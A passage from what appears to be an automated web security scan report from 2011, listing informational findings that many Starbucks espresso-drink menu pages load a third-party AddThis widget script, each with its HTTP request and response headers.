p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:22:38 GMT
Connection: close
Content-Length: 42997

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.94. http://www.starbucks.com/menu/drinks/espresso/cinnamon-dolce-latte  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/cinnamon-dolce-latte

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/espresso/cinnamon-dolce-latte HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:22:53 GMT
Connection: close
Content-Length: 42893

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.95. http://www.starbucks.com/menu/drinks/espresso/eggnog-latte  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/eggnog-latte

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/espresso/eggnog-latte HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:22:56 GMT
Connection: close
Content-Length: 42950

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.96. http://www.starbucks.com/menu/drinks/espresso/espresso-con-panna  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/espresso-con-panna

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/espresso/espresso-con-panna HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:23:07 GMT
Connection: close
Content-Length: 42186

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.97. http://www.starbucks.com/menu/drinks/espresso/espresso-macchiato  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/espresso-macchiato

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/espresso/espresso-macchiato HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:23:12 GMT
Connection: close
Content-Length: 42725

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.98. http://www.starbucks.com/menu/drinks/espresso/espresso-shot  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/espresso-shot

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/espresso/espresso-shot HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:22:57 GMT
Connection: close
Content-Length: 42066

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.99. http://www.starbucks.com/menu/drinks/espresso/flavored-latte  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/flavored-latte

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/espresso/flavored-latte HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:23:21 GMT
Connection: close
Content-Length: 42425

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.100. http://www.starbucks.com/menu/drinks/espresso/gingerbread-latte  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/gingerbread-latte

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/espresso/gingerbread-latte HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:23:48 GMT
Connection: close
Content-Length: 43229

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.101. http://www.starbucks.com/menu/drinks/espresso/iced-caffe-americano  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/iced-caffe-americano

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/espresso/iced-caffe-americano HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:23:58 GMT
Connection: close
Content-Length: 42372

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.102. http://www.starbucks.com/menu/drinks/espresso/iced-caffe-latte  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/iced-caffe-latte

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/espresso/iced-caffe-latte HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:24:03 GMT
Connection: close
Content-Length: 42552

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.103. http://www.starbucks.com/menu/drinks/espresso/iced-caffe-mocha  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/iced-caffe-mocha

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/espresso/iced-caffe-mocha HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:24:27 GMT
Connection: close
Content-Length: 42794

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.104. http://www.starbucks.com/menu/drinks/espresso/iced-caramel-macchiato  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/iced-caramel-macchiato

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/espresso/iced-caramel-macchiato HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:24:39 GMT
Connection: close
Content-Length: 42709

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.105. http://www.starbucks.com/menu/drinks/espresso/iced-cinnamon-dolce-latte  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/iced-cinnamon-dolce-latte

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/espresso/iced-cinnamon-dolce-latte HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:24:57 GMT
Connection: close
Content-Length: 42846

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.106. http://www.starbucks.com/menu/drinks/espresso/iced-flavored-latte  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/iced-flavored-latte

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/espresso/iced-flavored-latte HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:25:03 GMT
Connection: close
Content-Length: 42787

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.107. http://www.starbucks.com/menu/drinks/espresso/iced-gingerbread-latte  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/iced-gingerbread-latte

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/espresso/iced-gingerbread-latte HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:25:07 GMT
Connection: close
Content-Length: 43223

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.108. http://www.starbucks.com/menu/drinks/espresso/iced-peppermint-mocha  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/iced-peppermint-mocha

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/espresso/iced-peppermint-mocha HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:25:04 GMT
Connection: close
Content-Length: 42862

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.109. http://www.starbucks.com/menu/drinks/espresso/iced-peppermint-white-chocolate-mocha  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/iced-peppermint-white-chocolate-mocha

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/espresso/iced-peppermint-white-chocolate-mocha HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:25:17 GMT
Connection: close
Content-Length: 43181

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.110. http://www.starbucks.com/menu/drinks/espresso/iced-pumpkin-spice-latte  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/iced-pumpkin-spice-latte

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/espresso/iced-pumpkin-spice-latte HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:25:21 GMT
Connection: close
Content-Length: 43394

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.111. http://www.starbucks.com/menu/drinks/espresso/iced-skinny-flavored-latte  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/iced-skinny-flavored-latte

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/espresso/iced-skinny-flavored-latte HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:25:31 GMT
Connection: close
Content-Length: 43073

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.112. http://www.starbucks.com/menu/drinks/espresso/iced-toffee-mocha  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/iced-toffee-mocha

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/espresso/iced-toffee-mocha HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:25:34 GMT
Connection: close
Content-Length: 42845

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.113. http://www.starbucks.com/menu/drinks/espresso/iced-white-chocolate-mocha  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/iced-white-chocolate-mocha

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/espresso/iced-white-chocolate-mocha HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
